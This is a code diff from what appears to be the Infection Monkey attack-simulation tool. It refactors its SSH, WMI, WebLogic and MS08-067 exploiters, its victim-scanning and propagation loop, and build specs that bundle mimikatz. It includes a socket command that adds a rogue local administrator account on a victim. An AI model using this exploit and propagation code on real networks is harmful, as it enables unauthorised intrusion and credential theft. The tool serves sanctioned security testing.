||||||
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
|
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
|
||||||
|
|
|
@ -10,6 +10,7 @@ from infection_monkey.exploit.tools import get_target_monkey, get_monkey_depth
|
||||||
from infection_monkey.model import MONKEY_ARG
|
from infection_monkey.model import MONKEY_ARG
|
||||||
from infection_monkey.network.tools import check_tcp_port
|
from infection_monkey.network.tools import check_tcp_port
|
||||||
from infection_monkey.exploit.tools import build_monkey_commandline
|
from infection_monkey.exploit.tools import build_monkey_commandline
|
||||||
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
|
||||||
__author__ = 'hoffer'
|
__author__ = 'hoffer'
|
||||||
|
|
||||||
|
@ -20,6 +21,7 @@ TRANSFER_UPDATE_RATE = 15
|
||||||
|
|
||||||
class SSHExploiter(HostExploiter):
|
class SSHExploiter(HostExploiter):
|
||||||
_TARGET_OS_TYPE = ['linux', None]
|
_TARGET_OS_TYPE = ['linux', None]
|
||||||
|
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(SSHExploiter, self).__init__(host)
|
super(SSHExploiter, self).__init__(host)
|
||||||
|
|
|
@ -54,7 +54,7 @@ class WebRCE(HostExploiter):
|
||||||
exploit_config['upload_commands'] = None
|
exploit_config['upload_commands'] = None
|
||||||
|
|
||||||
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
|
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
|
||||||
exploit_config['url_extensions'] = None
|
exploit_config['url_extensions'] = []
|
||||||
|
|
||||||
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
|
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
|
||||||
exploit_config['stop_checking_urls'] = False
|
exploit_config['stop_checking_urls'] = False
|
||||||
|
|
|
@ -13,14 +13,17 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||||
|
|
||||||
import threading
|
import threading
|
||||||
import logging
|
import logging
|
||||||
|
import time
|
||||||
|
|
||||||
__author__ = "VakarisZ"
|
__author__ = "VakarisZ"
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
# How long server waits for get request in seconds
|
# How long server waits for get request in seconds
|
||||||
SERVER_TIMEOUT = 4
|
SERVER_TIMEOUT = 4
|
||||||
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
|
# How long should be wait after each request in seconds
|
||||||
REQUEST_TIMEOUT = 2
|
REQUEST_DELAY = 0.0001
|
||||||
|
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
|
||||||
|
REQUEST_TIMEOUT = 5
|
||||||
# How long to wait for response in exploitation. In seconds
|
# How long to wait for response in exploitation. In seconds
|
||||||
EXECUTION_TIMEOUT = 15
|
EXECUTION_TIMEOUT = 15
|
||||||
URLS = ["/wls-wsat/CoordinatorPortType",
|
URLS = ["/wls-wsat/CoordinatorPortType",
|
||||||
|
@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE):
|
||||||
print(e)
|
print(e)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
def check_if_exploitable(self, url):
|
def add_vulnerable_urls(self, urls, stop_checking=False):
|
||||||
|
"""
|
||||||
|
Overrides parent method to use listener server
|
||||||
|
"""
|
||||||
# Server might get response faster than it starts listening to it, we need a lock
|
# Server might get response faster than it starts listening to it, we need a lock
|
||||||
httpd, lock = self._start_http_server()
|
httpd, lock = self._start_http_server()
|
||||||
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
|
exploitable = False
|
||||||
|
|
||||||
|
for url in urls:
|
||||||
|
if self.check_if_exploitable_weblogic(url, httpd):
|
||||||
|
exploitable = True
|
||||||
|
break
|
||||||
|
|
||||||
|
if not exploitable and httpd.get_requests < 1:
|
||||||
|
# Wait for responses
|
||||||
|
time.sleep(REQUEST_TIMEOUT)
|
||||||
|
|
||||||
|
if httpd.get_requests > 0:
|
||||||
|
# Add all urls because we don't know which one is vulnerable
|
||||||
|
self.vulnerable_urls.extend(urls)
|
||||||
|
self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
|
||||||
|
else:
|
||||||
|
LOG.info("No vulnerable urls found, skipping.")
|
||||||
|
|
||||||
|
self._stop_http_server(httpd, lock)
|
||||||
|
|
||||||
|
def check_if_exploitable_weblogic(self, url, httpd):
|
||||||
|
payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
|
||||||
try:
|
try:
|
||||||
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
|
post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
|
||||||
except exceptions.ReadTimeout:
|
except exceptions.ReadTimeout:
|
||||||
# Our request does not get response thus we get ReadTimeout error
|
# Our request will not get response thus we get ReadTimeout error
|
||||||
pass
|
pass
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
LOG.error("Something went wrong: %s" % e)
|
LOG.error("Something went wrong: %s" % e)
|
||||||
self._stop_http_server(httpd, lock)
|
|
||||||
return httpd.get_requests > 0
|
return httpd.get_requests > 0
|
||||||
|
|
||||||
def _start_http_server(self):
|
def _start_http_server(self):
|
||||||
|
@ -94,7 +120,8 @@ class WebLogicExploiter(WebRCE):
|
||||||
lock.acquire()
|
lock.acquire()
|
||||||
return httpd, lock
|
return httpd, lock
|
||||||
|
|
||||||
def _stop_http_server(self, httpd, lock):
|
@staticmethod
|
||||||
|
def _stop_http_server(httpd, lock):
|
||||||
lock.release()
|
lock.release()
|
||||||
httpd.join(SERVER_TIMEOUT)
|
httpd.join(SERVER_TIMEOUT)
|
||||||
httpd.stop()
|
httpd.stop()
|
||||||
|
@ -168,8 +195,8 @@ class WebLogicExploiter(WebRCE):
|
||||||
we determine if we can exploit by either getting a GET request from host or not.
|
we determine if we can exploit by either getting a GET request from host or not.
|
||||||
"""
|
"""
|
||||||
def __init__(self, local_ip, local_port, lock, max_requests=1):
|
def __init__(self, local_ip, local_port, lock, max_requests=1):
|
||||||
self._local_ip = local_ip
|
self.local_ip = local_ip
|
||||||
self._local_port = local_port
|
self.local_port = local_port
|
||||||
self.get_requests = 0
|
self.get_requests = 0
|
||||||
self.max_requests = max_requests
|
self.max_requests = max_requests
|
||||||
self._stopped = False
|
self._stopped = False
|
||||||
|
@ -184,7 +211,7 @@ class WebLogicExploiter(WebRCE):
|
||||||
LOG.info('Server received a request from vulnerable machine')
|
LOG.info('Server received a request from vulnerable machine')
|
||||||
self.get_requests += 1
|
self.get_requests += 1
|
||||||
LOG.info('Server waiting for exploited machine request...')
|
LOG.info('Server waiting for exploited machine request...')
|
||||||
httpd = HTTPServer((self._local_ip, self._local_port), S)
|
httpd = HTTPServer((self.local_ip, self.local_port), S)
|
||||||
httpd.daemon = True
|
httpd.daemon = True
|
||||||
self.lock.release()
|
self.lock.release()
|
||||||
while not self._stopped and self.get_requests < self.max_requests:
|
while not self._stopped and self.get_requests < self.max_requests:
|
||||||
|
|
|
@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
|
|
||||||
sock.send("cmd /c (net user %s %s /add) &&"
|
sock.send("cmd /c (net user %s %s /add) &&"
|
||||||
" (net localgroup administrators %s /add)\r\n" %
|
" (net localgroup administrators %s /add)\r\n" %
|
||||||
(self._config.ms08_067_remote_user_add,
|
(self._config.user_to_add,
|
||||||
self._config.ms08_067_remote_user_pass,
|
self._config.remote_user_pass,
|
||||||
self._config.ms08_067_remote_user_add))
|
self._config.user_to_add))
|
||||||
time.sleep(2)
|
time.sleep(2)
|
||||||
reply = sock.recv(1000)
|
reply = sock.recv(1000)
|
||||||
|
|
||||||
|
@ -213,8 +213,8 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
remote_full_path = SmbTools.copy_file(self.host,
|
remote_full_path = SmbTools.copy_file(self.host,
|
||||||
src_path,
|
src_path,
|
||||||
self._config.dropper_target_path_win_32,
|
self._config.dropper_target_path_win_32,
|
||||||
self._config.ms08_067_remote_user_add,
|
self._config.user_to_add,
|
||||||
self._config.ms08_067_remote_user_pass)
|
self._config.remote_user_pass)
|
||||||
|
|
||||||
if not remote_full_path:
|
if not remote_full_path:
|
||||||
# try other passwords for administrator
|
# try other passwords for administrator
|
||||||
|
@ -240,7 +240,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
|
|
||||||
try:
|
try:
|
||||||
sock.send("start %s\r\n" % (cmdline,))
|
sock.send("start %s\r\n" % (cmdline,))
|
||||||
sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,))
|
sock.send("net user %s /delete\r\n" % (self._config.user_to_add,))
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
|
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
|
||||||
return False
|
return False
|
||||||
|
|
|
@ -9,12 +9,14 @@ from infection_monkey.exploit import HostExploiter
|
||||||
from infection_monkey.exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, \
|
from infection_monkey.exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, \
|
||||||
get_monkey_depth, build_monkey_commandline
|
get_monkey_depth, build_monkey_commandline
|
||||||
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
|
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
|
||||||
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class WmiExploiter(HostExploiter):
|
class WmiExploiter(HostExploiter):
|
||||||
_TARGET_OS_TYPE = ['windows']
|
_TARGET_OS_TYPE = ['windows']
|
||||||
|
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(WmiExploiter, self).__init__(host)
|
super(WmiExploiter, self).__init__(host)
|
||||||
|
|
|
@ -13,6 +13,7 @@ from infection_monkey.config import WormConfiguration, EXTERNAL_CONFIG_FILE
|
||||||
from infection_monkey.dropper import MonkeyDrops
|
from infection_monkey.dropper import MonkeyDrops
|
||||||
from infection_monkey.model import MONKEY_ARG, DROPPER_ARG
|
from infection_monkey.model import MONKEY_ARG, DROPPER_ARG
|
||||||
from infection_monkey.monkey import InfectionMonkey
|
from infection_monkey.monkey import InfectionMonkey
|
||||||
|
import infection_monkey.post_breach # dummy import for pyinstaller
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = 'itamar'
|
||||||
|
|
||||||
|
@ -21,7 +22,7 @@ LOG = None
|
||||||
LOG_CONFIG = {'version': 1,
|
LOG_CONFIG = {'version': 1,
|
||||||
'disable_existing_loggers': False,
|
'disable_existing_loggers': False,
|
||||||
'formatters': {'standard': {
|
'formatters': {'standard': {
|
||||||
'format': '%(asctime)s [%(process)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s'},
|
'format': '%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s'},
|
||||||
},
|
},
|
||||||
'handlers': {'console': {'class': 'logging.StreamHandler',
|
'handlers': {'console': {'class': 'logging.StreamHandler',
|
||||||
'level': 'DEBUG',
|
'level': 'DEBUG',
|
||||||
|
|
|
@ -24,6 +24,8 @@ CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
||||||
RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
|
RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
|
||||||
# Commands used to check for architecture and if machine is exploitable
|
# Commands used to check for architecture and if machine is exploitable
|
||||||
CHECK_COMMAND = "echo %s" % ID_STRING
|
CHECK_COMMAND = "echo %s" % ID_STRING
|
||||||
|
# CMD prefix for windows commands
|
||||||
|
CMD_PREFIX = "cmd.exe /c"
|
||||||
# Architecture checking commands
|
# Architecture checking commands
|
||||||
GET_ARCH_WINDOWS = "wmic os get osarchitecture"
|
GET_ARCH_WINDOWS = "wmic os get osarchitecture"
|
||||||
GET_ARCH_LINUX = "lscpu"
|
GET_ARCH_LINUX = "lscpu"
|
||||||
|
|
|
@ -2,8 +2,9 @@ __author__ = 'itamar'
|
||||||
|
|
||||||
|
|
||||||
class VictimHost(object):
|
class VictimHost(object):
|
||||||
def __init__(self, ip_addr):
|
def __init__(self, ip_addr, domain_name=''):
|
||||||
self.ip_addr = ip_addr
|
self.ip_addr = ip_addr
|
||||||
|
self.domain_name = str(domain_name)
|
||||||
self.os = {}
|
self.os = {}
|
||||||
self.services = {}
|
self.services = {}
|
||||||
self.monkey_exe = None
|
self.monkey_exe = None
|
||||||
|
|
|
@ -1,32 +0,0 @@
|
||||||
# -*- mode: python -*-
|
|
||||||
|
|
||||||
block_cipher = None
|
|
||||||
|
|
||||||
|
|
||||||
a = Analysis(['main.py'],
|
|
||||||
pathex=['..'],
|
|
||||||
binaries=None,
|
|
||||||
datas=None,
|
|
||||||
hiddenimports=['_cffi_backend'],
|
|
||||||
hookspath=None,
|
|
||||||
runtime_hooks=None,
|
|
||||||
excludes=None,
|
|
||||||
win_no_prefer_redirects=None,
|
|
||||||
win_private_assemblies=None,
|
|
||||||
cipher=block_cipher)
|
|
||||||
|
|
||||||
a.binaries += [('sc_monkey_runner32.so', './bin/sc_monkey_runner32.so', 'BINARY')]
|
|
||||||
a.binaries += [('sc_monkey_runner64.so', './bin/sc_monkey_runner64.so', 'BINARY')]
|
|
||||||
|
|
||||||
pyz = PYZ(a.pure, a.zipped_data,
|
|
||||||
cipher=block_cipher)
|
|
||||||
exe = EXE(pyz,
|
|
||||||
a.scripts,
|
|
||||||
a.binaries,
|
|
||||||
a.zipfiles,
|
|
||||||
a.datas,
|
|
||||||
name='monkey',
|
|
||||||
debug=False,
|
|
||||||
strip=True,
|
|
||||||
upx=True,
|
|
||||||
console=True )
|
|
|
@ -16,6 +16,9 @@ from infection_monkey.network.network_scanner import NetworkScanner
|
||||||
from infection_monkey.system_info import SystemInfoCollector
|
from infection_monkey.system_info import SystemInfoCollector
|
||||||
from infection_monkey.system_singleton import SystemSingleton
|
from infection_monkey.system_singleton import SystemSingleton
|
||||||
from infection_monkey.windows_upgrader import WindowsUpgrader
|
from infection_monkey.windows_upgrader import WindowsUpgrader
|
||||||
|
from infection_monkey.post_breach.post_breach_handler import PostBreach
|
||||||
|
from common.utils.attack_status_enum import ScanStatus
|
||||||
|
from infection_monkey.transport.attack_telems.victim_host_telem import VictimHostTelem
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = 'itamar'
|
||||||
|
|
||||||
|
@ -76,6 +79,9 @@ class InfectionMonkey(object):
|
||||||
LOG.info("Monkey couldn't find server. Going down.")
|
LOG.info("Monkey couldn't find server. Going down.")
|
||||||
return
|
return
|
||||||
|
|
||||||
|
# Create a dir for monkey files if there isn't one
|
||||||
|
utils.create_monkey_dir()
|
||||||
|
|
||||||
if WindowsUpgrader.should_upgrade():
|
if WindowsUpgrader.should_upgrade():
|
||||||
self._upgrading_to_64 = True
|
self._upgrading_to_64 = True
|
||||||
self._singleton.unlock()
|
self._singleton.unlock()
|
||||||
|
@ -109,6 +115,12 @@ class InfectionMonkey(object):
|
||||||
system_info = system_info_collector.get_info()
|
system_info = system_info_collector.get_info()
|
||||||
ControlClient.send_telemetry("system_info_collection", system_info)
|
ControlClient.send_telemetry("system_info_collection", system_info)
|
||||||
|
|
||||||
|
for action_class in WormConfiguration.post_breach_actions:
|
||||||
|
action = action_class()
|
||||||
|
action.act()
|
||||||
|
|
||||||
|
PostBreach().execute()
|
||||||
|
|
||||||
if 0 == WormConfiguration.depth:
|
if 0 == WormConfiguration.depth:
|
||||||
LOG.debug("Reached max depth, shutting down")
|
LOG.debug("Reached max depth, shutting down")
|
||||||
ControlClient.send_telemetry("trace", "Reached max depth, shutting down")
|
ControlClient.send_telemetry("trace", "Reached max depth, shutting down")
|
||||||
|
@ -120,9 +132,6 @@ class InfectionMonkey(object):
|
||||||
ControlClient.keepalive()
|
ControlClient.keepalive()
|
||||||
ControlClient.load_control_config()
|
ControlClient.load_control_config()
|
||||||
|
|
||||||
LOG.debug("Users to try: %s" % str(WormConfiguration.exploit_user_list))
|
|
||||||
LOG.debug("Passwords to try: %s" % str(WormConfiguration.exploit_password_list))
|
|
||||||
|
|
||||||
self._network.initialize()
|
self._network.initialize()
|
||||||
|
|
||||||
self._exploiters = WormConfiguration.exploiter_classes
|
self._exploiters = WormConfiguration.exploiter_classes
|
||||||
|
@ -132,8 +141,7 @@ class InfectionMonkey(object):
|
||||||
if not self._keep_running or not WormConfiguration.alive:
|
if not self._keep_running or not WormConfiguration.alive:
|
||||||
break
|
break
|
||||||
|
|
||||||
machines = self._network.get_victim_machines(WormConfiguration.scanner_class,
|
machines = self._network.get_victim_machines(max_find=WormConfiguration.victims_max_find,
|
||||||
max_find=WormConfiguration.victims_max_find,
|
|
||||||
stop_callback=ControlClient.check_for_stop)
|
stop_callback=ControlClient.check_for_stop)
|
||||||
is_empty = True
|
is_empty = True
|
||||||
for machine in machines:
|
for machine in machines:
|
||||||
|
@ -147,7 +155,7 @@ class InfectionMonkey(object):
|
||||||
finger.get_host_fingerprint(machine)
|
finger.get_host_fingerprint(machine)
|
||||||
|
|
||||||
ControlClient.send_telemetry('scan', {'machine': machine.as_dict(),
|
ControlClient.send_telemetry('scan', {'machine': machine.as_dict(),
|
||||||
'scanner': WormConfiguration.scanner_class.__name__})
|
})
|
||||||
|
|
||||||
# skip machines that we've already exploited
|
# skip machines that we've already exploited
|
||||||
if machine in self._exploited_machines:
|
if machine in self._exploited_machines:
|
||||||
|
@ -167,44 +175,19 @@ class InfectionMonkey(object):
|
||||||
LOG.debug("Default server: %s set to machine: %r" % (self._default_server, machine))
|
LOG.debug("Default server: %s set to machine: %r" % (self._default_server, machine))
|
||||||
machine.set_default_server(self._default_server)
|
machine.set_default_server(self._default_server)
|
||||||
|
|
||||||
successful_exploiter = None
|
# Order exploits according to their type
|
||||||
|
self._exploiters = sorted(self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value)
|
||||||
|
host_exploited = False
|
||||||
for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
|
for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
|
||||||
if not exploiter.is_os_supported():
|
if self.try_exploiting(machine, exploiter):
|
||||||
LOG.info("Skipping exploiter %s host:%r, os is not supported",
|
host_exploited = True
|
||||||
exploiter.__class__.__name__, machine)
|
VictimHostTelem('T1210', ScanStatus.USED.value, machine=machine).send()
|
||||||
continue
|
|
||||||
|
|
||||||
LOG.info("Trying to exploit %r with exploiter %s...", machine, exploiter.__class__.__name__)
|
|
||||||
|
|
||||||
result = False
|
|
||||||
try:
|
|
||||||
result = exploiter.exploit_host()
|
|
||||||
if result:
|
|
||||||
successful_exploiter = exploiter
|
|
||||||
break
|
|
||||||
else:
|
|
||||||
LOG.info("Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__)
|
|
||||||
|
|
||||||
except Exception as exc:
|
|
||||||
LOG.exception("Exception while attacking %s using %s: %s",
|
|
||||||
machine, exploiter.__class__.__name__, exc)
|
|
||||||
finally:
|
|
||||||
exploiter.send_exploit_telemetry(result)
|
|
||||||
|
|
||||||
if successful_exploiter:
|
|
||||||
self._exploited_machines.add(machine)
|
|
||||||
|
|
||||||
LOG.info("Successfully propagated to %s using %s",
|
|
||||||
machine, successful_exploiter.__class__.__name__)
|
|
||||||
|
|
||||||
# check if max-exploitation limit is reached
|
|
||||||
if WormConfiguration.victims_max_exploit <= len(self._exploited_machines):
|
|
||||||
self._keep_running = False
|
|
||||||
|
|
||||||
LOG.info("Max exploited victims reached (%d)", WormConfiguration.victims_max_exploit)
|
|
||||||
break
|
break
|
||||||
else:
|
if not host_exploited:
|
||||||
self._fail_exploitation_machines.add(machine)
|
self._fail_exploitation_machines.add(machine)
|
||||||
|
VictimHostTelem('T1210', ScanStatus.SCANNED.value, machine=machine).send()
|
||||||
|
if not self._keep_running:
|
||||||
|
break
|
||||||
|
|
||||||
if (not is_empty) and (WormConfiguration.max_iterations > iteration_index + 1):
|
if (not is_empty) and (WormConfiguration.max_iterations > iteration_index + 1):
|
||||||
time_to_sleep = WormConfiguration.timeout_between_iterations
|
time_to_sleep = WormConfiguration.timeout_between_iterations
|
||||||
|
@ -242,6 +225,7 @@ class InfectionMonkey(object):
|
||||||
self.send_log()
|
self.send_log()
|
||||||
self._singleton.unlock()
|
self._singleton.unlock()
|
||||||
|
|
||||||
|
utils.remove_monkey_dir()
|
||||||
InfectionMonkey.self_delete()
|
InfectionMonkey.self_delete()
|
||||||
LOG.info("Monkey is shutting down")
|
LOG.info("Monkey is shutting down")
|
||||||
|
|
||||||
|
@ -279,3 +263,50 @@ class InfectionMonkey(object):
|
||||||
log = ''
|
log = ''
|
||||||
|
|
||||||
ControlClient.send_log(log)
|
ControlClient.send_log(log)
|
||||||
|
|
||||||
|
def try_exploiting(self, machine, exploiter):
|
||||||
|
"""
|
||||||
|
Workflow of exploiting one machine with one exploiter
|
||||||
|
:param machine: Machine monkey tries to exploit
|
||||||
|
:param exploiter: Exploiter to use on that machine
|
||||||
|
:return: True if successfully exploited, False otherwise
|
||||||
|
"""
|
||||||
|
if not exploiter.is_os_supported():
|
||||||
|
LOG.info("Skipping exploiter %s host:%r, os is not supported",
|
||||||
|
exploiter.__class__.__name__, machine)
|
||||||
|
return False
|
||||||
|
|
||||||
|
LOG.info("Trying to exploit %r with exploiter %s...", machine, exploiter.__class__.__name__)
|
||||||
|
|
||||||
|
result = False
|
||||||
|
try:
|
||||||
|
result = exploiter.exploit_host()
|
||||||
|
if result:
|
||||||
|
self.successfully_exploited(machine, exploiter)
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.info("Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__)
|
||||||
|
|
||||||
|
except Exception as exc:
|
||||||
|
LOG.exception("Exception while attacking %s using %s: %s",
|
||||||
|
machine, exploiter.__class__.__name__, exc)
|
||||||
|
finally:
|
||||||
|
exploiter.send_exploit_telemetry(result)
|
||||||
|
return False
|
||||||
|
|
||||||
|
def successfully_exploited(self, machine, exploiter):
|
||||||
|
"""
|
||||||
|
Workflow of registering successfully exploited machine
|
||||||
|
:param machine: machine that was exploited
|
||||||
|
:param exploiter: exploiter that succeeded
|
||||||
|
"""
|
||||||
|
self._exploited_machines.add(machine)
|
||||||
|
|
||||||
|
LOG.info("Successfully propagated to %s using %s",
|
||||||
|
machine, exploiter.__class__.__name__)
|
||||||
|
|
||||||
|
# check if max-exploitation limit is reached
|
||||||
|
if WormConfiguration.victims_max_exploit <= len(self._exploited_machines):
|
||||||
|
self._keep_running = False
|
||||||
|
|
||||||
|
LOG.info("Max exploited victims reached (%d)", WormConfiguration.victims_max_exploit)
|
||||||
|
|
|
@ -2,39 +2,120 @@
|
||||||
import os
|
import os
|
||||||
import platform
|
import platform
|
||||||
|
|
||||||
|
|
||||||
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
block_cipher = None
|
||||||
|
|
||||||
# Name of zip file in monkey. That's the name of the file in the _MEI folder
|
# Name of zip file in monkey. That's the name of the file in the _MEI folder
|
||||||
MIMIKATZ_ZIP_NAME = 'tmpzipfile123456.zip'
|
MIMIKATZ_ZIP_NAME = 'tmpzipfile123456.zip'
|
||||||
|
|
||||||
|
|
||||||
|
def main():
|
||||||
|
a = Analysis(['main.py'],
|
||||||
|
pathex=['..'],
|
||||||
|
hiddenimports=get_hidden_imports(),
|
||||||
|
hookspath=None,
|
||||||
|
runtime_hooks=None,
|
||||||
|
binaries=None,
|
||||||
|
datas=None,
|
||||||
|
excludes=None,
|
||||||
|
win_no_prefer_redirects=None,
|
||||||
|
win_private_assemblies=None,
|
||||||
|
cipher=block_cipher
|
||||||
|
)
|
||||||
|
|
||||||
|
a.binaries += get_binaries()
|
||||||
|
a.datas = process_datas(a.datas)
|
||||||
|
|
||||||
|
pyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)
|
||||||
|
exe = EXE(pyz,
|
||||||
|
a.scripts,
|
||||||
|
a.binaries,
|
||||||
|
a.zipfiles,
|
||||||
|
a.datas,
|
||||||
|
name=get_monkey_filename(),
|
||||||
|
debug=False,
|
||||||
|
strip=get_exe_strip(),
|
||||||
|
upx=True,
|
||||||
|
console=True,
|
||||||
|
icon=get_exe_icon())
|
||||||
|
|
||||||
|
|
||||||
|
def is_windows():
|
||||||
|
return platform.system().find("Windows") >= 0
|
||||||
|
|
||||||
|
|
||||||
|
def is_32_bit():
|
||||||
|
return platform.architecture()[0] == "32bit"
|
||||||
|
|
||||||
|
|
||||||
|
def get_bin_folder():
|
||||||
|
return os.path.join('.', 'bin')
|
||||||
|
|
||||||
|
|
||||||
|
def get_bin_file_path(filename):
|
||||||
|
return os.path.join(get_bin_folder(), filename)
|
||||||
|
|
||||||
|
|
||||||
|
def process_datas(orig_datas):
|
||||||
|
datas = orig_datas
|
||||||
|
if is_windows():
|
||||||
|
datas = [i for i in datas if i[0].find('Include') < 0]
|
||||||
|
datas += [(MIMIKATZ_ZIP_NAME, get_mimikatz_zip_path(), 'BINARY')]
|
||||||
|
return datas
|
||||||
|
|
||||||
|
|
||||||
|
def get_binaries():
|
||||||
|
binaries = get_windows_only_binaries() if is_windows() else get_linux_only_binaries()
|
||||||
|
binaries += get_sc_binaries()
|
||||||
|
return binaries
|
||||||
|
|
||||||
|
|
||||||
|
def get_windows_only_binaries():
|
||||||
|
binaries = []
|
||||||
|
binaries += get_msvcr()
|
||||||
|
return binaries
|
||||||
|
|
||||||
|
|
||||||
|
def get_linux_only_binaries():
|
||||||
|
binaries = []
|
||||||
|
binaries += get_traceroute_binaries()
|
||||||
|
return binaries
|
||||||
|
|
||||||
|
|
||||||
|
def get_hidden_imports():
|
||||||
|
return ['_cffi_backend', 'queue', '_mssql'] if is_windows() else ['_cffi_backend','_mssql']
|
||||||
|
|
||||||
|
|
||||||
|
def get_sc_binaries():
|
||||||
|
return [(x, get_bin_file_path(x), 'BINARY') for x in ['sc_monkey_runner32.so', 'sc_monkey_runner64.so']]
|
||||||
|
|
||||||
|
|
||||||
|
def get_msvcr():
|
||||||
|
return [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')]
|
||||||
|
|
||||||
|
|
||||||
|
def get_traceroute_binaries():
|
||||||
|
traceroute_name = 'traceroute32' if is_32_bit() else 'traceroute64'
|
||||||
|
return [(traceroute_name, get_bin_file_path(traceroute_name), 'BINARY')]
|
||||||
|
|
||||||
|
|
||||||
|
def get_monkey_filename():
|
||||||
|
return 'monkey.exe' if is_windows() else 'monkey'
|
||||||
|
|
||||||
|
|
||||||
|
def get_exe_strip():
|
||||||
|
return not is_windows()
|
||||||
|
|
||||||
|
|
||||||
|
def get_exe_icon():
|
||||||
|
return 'monkey.ico' if is_windows() else None
|
||||||
|
|
||||||
|
|
||||||
def get_mimikatz_zip_path():
|
def get_mimikatz_zip_path():
|
||||||
if platform.architecture()[0] == "32bit":
|
mk_filename = 'mk32.zip' if is_32_bit() else 'mk64.zip'
|
||||||
return '.\\bin\\mk32.zip'
|
return os.path.join(get_bin_folder(), mk_filename)
|
||||||
else:
|
|
||||||
return '.\\bin\\mk64.zip'
|
|
||||||
|
|
||||||
|
|
||||||
a = Analysis(['main.py'],
|
main() # We don't check if __main__ because this isn't the main script.
|
||||||
pathex=['..'],
|
|
||||||
hiddenimports=['_cffi_backend', 'queue'],
|
|
||||||
hookspath=None,
|
|
||||||
runtime_hooks=None)
|
|
||||||
|
|
||||||
a.binaries += [('sc_monkey_runner32.so', '.\\bin\\sc_monkey_runner32.so', 'BINARY')]
|
|
||||||
a.binaries += [('sc_monkey_runner64.so', '.\\bin\\sc_monkey_runner64.so', 'BINARY')]
|
|
||||||
|
|
||||||
if platform.system().find("Windows") >= 0:
|
|
||||||
a.datas = [i for i in a.datas if i[0].find('Include') < 0]
|
|
||||||
a.datas += [(MIMIKATZ_ZIP_NAME, get_mimikatz_zip_path(), 'BINARY')]
|
|
||||||
|
|
||||||
pyz = PYZ(a.pure)
|
|
||||||
exe = EXE(pyz,
|
|
||||||
a.scripts,
|
|
||||||
a.binaries + [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')],
|
|
||||||
a.zipfiles,
|
|
||||||
a.datas,
|
|
||||||
name='monkey.exe',
|
|
||||||
debug=False,
|
|
||||||
strip=None,
|
|
||||||
upx=True,
|
|
||||||
console=True,
|
|
||||||
icon='monkey.ico')
|
|
||||||
|
|
|
@ -6,6 +6,7 @@ from infection_monkey.config import WormConfiguration
|
||||||
from infection_monkey.network.info import local_ips, get_interfaces_ranges
|
from infection_monkey.network.info import local_ips, get_interfaces_ranges
|
||||||
from infection_monkey.model import VictimHost
|
from infection_monkey.model import VictimHost
|
||||||
from infection_monkey.network import HostScanner
|
from infection_monkey.network import HostScanner
|
||||||
|
from infection_monkey.network import TcpScanner, PingScanner
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = 'itamar'
|
||||||
|
|
||||||
|
@ -62,7 +63,7 @@ class NetworkScanner(object):
|
||||||
|
|
||||||
return subnets_to_scan
|
return subnets_to_scan
|
||||||
|
|
||||||
